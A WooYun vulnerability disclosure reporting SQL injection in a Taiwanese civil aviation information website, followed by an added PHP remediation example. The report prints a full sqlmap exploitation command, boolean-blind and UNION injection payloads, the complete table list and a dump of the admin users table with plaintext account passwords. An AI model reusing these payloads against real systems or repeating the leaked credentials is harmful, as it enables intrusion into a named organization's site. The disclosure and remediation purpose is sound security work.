WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
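2015-10-25: Details reported to the vendor; awaiting vendor handling
2015-10-27: Vendor confirmed; details disclosed to the vendor only
2015-11-06: Details disclosed to core white hats and experts in related fields
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-11: Details disclosed to the public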
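SQL injection vulnerability in the Taiwan Civil Aviation Information Network (123 tables / administrator plaintext passwords leaked / login possible)
Test URL: http://**.**.**.**/company_detail.php?id=1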
python sqlmap.py -u "http://**.**.**.**/company_detail.php?id=1" --random-agent -p id --technique=BU -D twairinfocom -T _users -C id,account,password,realname --dump
Login URL: http://**.**.**.**/admin/_login.php
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2582=2582

    Type: UNION query
    Title: MySQL UNION query (55) - 21 columns
    Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'twairinfocom@%'
current user is DBA: False
database management system users [1]:
[*] 'twairinfocom'@'%'

available databases [2]:
[*] information_schema
[*] twairinfocom

Database: twairinfocom
[123 tables]
+----------------------------+
| _acl_group                 |
| _acl_user                  |
| _config                    |
| _content                   |
| _errorlog                  |
| _groups                    |
| _users                     |
| column                     |
| order                      |
| pad                        |
| ad                         |
| adbanner                   |
| aircompanyindex            |
| airplainplace              |
| airplaintime               |
| airport                    |
| airportindex               |
| album                      |
| album_reply                |
| annals                     |
| blog                       |
| blog_album                 |
| blog_album_category        |
| blog_album_reply           |
| blog_article               |
| blog_article_category      |
| company                    |
| craft                      |
| craft_from                 |
| craft_iata                 |
| craft_note                 |
| craft_price                |
| craft_reply                |
| craft_stock                |
| craft_stock_airplan        |
| craft_user                 |
| cyclopedic                 |
| discuss                    |
| discusstype                |
| dollartype                 |
| download                   |
| enewspaper                 |
| english                    |
| englishtype                |
| exchange                   |
| freight                    |
| holiday                    |
| km                         |
| link                       |
| nation                     |
| news                       |
| p                          |
| phpbb_acl_groups           |
| phpbb_acl_options          |
| phpbb_acl_roles            |
| phpbb_acl_roles_data       |
| phpbb_acl_users            |
| phpbb_attachments          |
| phpbb_banlist              |
| phpbb_bbcodes              |
| phpbb_bookmarks            |
| phpbb_bots                 |
| phpbb_config               |
| phpbb_confirm              |
| phpbb_disallow             |
| phpbb_drafts               |
| phpbb_extension_groups     |
| phpbb_extensions           |
| phpbb_forums               |
| phpbb_forums_access        |
| phpbb_forums_track         |
| phpbb_forums_watch         |
| phpbb_groups               |
| phpbb_icons                |
| phpbb_lang                 |
| phpbb_log                  |
| phpbb_moderator_cache      |
| phpbb_modules              |
| phpbb_poll_options         |
| phpbb_poll_votes           |
| phpbb_posts                |
| phpbb_privmsgs             |
| phpbb_privmsgs_folder      |
| phpbb_privmsgs_rules       |
| phpbb_privmsgs_to          |
| phpbb_profile_fields       |
| phpbb_profile_fields_data  |
| phpbb_profile_fields_lang  |
| phpbb_profile_lang         |
| phpbb_ranks                |
| phpbb_reports              |
| phpbb_reports_reasons      |
| phpbb_search_results       |
| phpbb_search_wordlist      |
| phpbb_search_wordmatch     |
| phpbb_sessions             |
| phpbb_sessions_keys        |
| phpbb_sitelist             |
| phpbb_smilies              |
| phpbb_styles               |
| phpbb_styles_imageset      |
| phpbb_styles_imageset_data |
| phpbb_styles_template      |
| phpbb_styles_template_data |
| phpbb_styles_theme         |
| phpbb_topics               |
| phpbb_topics_posted        |
| phpbb_topics_track         |
| phpbb_topics_watch         |
| phpbb_user_group           |
| phpbb_users                |
| phpbb_warnings             |
| phpbb_words                |
| phpbb_zebra                |
| ptype                      |
| rediscuss                  |
| sail                       |
| sample                     |
| stock_company              |
| vote                       |
| voterecord                 |
| wanted                     |
| zipcode                    |
+----------------------------+

Database: twairinfocom
Table: _users
[5 columns]
+----------+---------------------+
| Column   | Type                |
+----------+---------------------+
| account  | varchar(30)         |
| group_id | int(10) unsigned    |
| id       | bigint(20) unsigned |
| password | varchar(30)         |
| realname | varchar(30)         |
+----------+---------------------+

Database: twairinfocom
Table: _users
[2 entries]
+----+-----------+-------------------+----------+
| id | account   | password          | realname |
+----+-----------+-------------------+----------+
| 1  | admin     | KATY1130MAGIC0911 | 最高管理者    |
| 24 | magic-tpe | ijnb7557          | magic    |
+----+-----------+-------------------+----------+
Add filtering.
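One way to apply the fix to a numeric `id` parameter and to the plaintext `_users.password` column shown in the dump, as an added example that is not part of the original report or the site's code. It assumes PHP with PDO; the `company` columns `id` and `name`, the function names and the in-memory SQLite demo rows are hypothetical.

```php
<?php
// Accept only a positive decimal integer for ?id=; anything else is rejected.
function parse_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}
// Bound parameter: the request value never becomes part of the SQL text.
function find_company(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, name FROM company WHERE id = :id'); // hypothetical columns
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Verify a login; a legacy plaintext value is replaced by a hash on first success.
// _users.password must be widened first (VARCHAR(30) cannot hold a 60-character bcrypt hash).
function check_login(PDO $pdo, string $account, string $supplied): bool
{
    $stmt = $pdo->prepare('SELECT id, password FROM _users WHERE account = :a');
    $stmt->execute([':a' => $account]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($user === false) {
        return false;
    }
    $stored = (string) $user['password'];
    $legacy = empty(password_get_info($stored)['algo']); // not a password_hash() value
    $ok = $legacy ? hash_equals($stored, $supplied) : password_verify($supplied, $stored);
    if ($ok && ($legacy || password_needs_rehash($stored, PASSWORD_DEFAULT))) {
        $upd = $pdo->prepare('UPDATE _users SET password = :p WHERE id = :id');
        $upd->execute([':p' => password_hash($supplied, PASSWORD_DEFAULT), ':id' => $user['id']]);
    }
    return $ok;
}

// Demo on in-memory SQLite with constructed rows (for MySQL, set PDO::ATTR_EMULATE_PREPARES => false).
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE company (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec('CREATE TABLE _users (id INTEGER PRIMARY KEY, account TEXT, password TEXT)');
$pdo->exec("INSERT INTO company VALUES (1, 'Example Air')");
$pdo->exec("INSERT INTO _users VALUES (1, 'demo', 'constructed-plaintext')");
foreach (['1', '1 AND 2582=2582', '-1986 UNION ALL SELECT 55#'] as $raw) {
    $id = parse_id($raw);
    echo $raw, ' => ', $id === null ? 'rejected' : json_encode(find_company($pdo, $id)), PHP_EOL;
}
var_dump(check_login($pdo, 'demo', 'constructed-plaintext')); // legacy match, row is rehashed
var_dump(check_login($pdo, 'demo', 'constructed-plaintext')); // now verified against the hash
```

The dump also shows the application account as `'twairinfocom'@'%'`; restricting that account to the web server's host and to the privileges the site needs limits what an injection can reach.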
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-10-27 00:10
Thank you for the report.
None yet.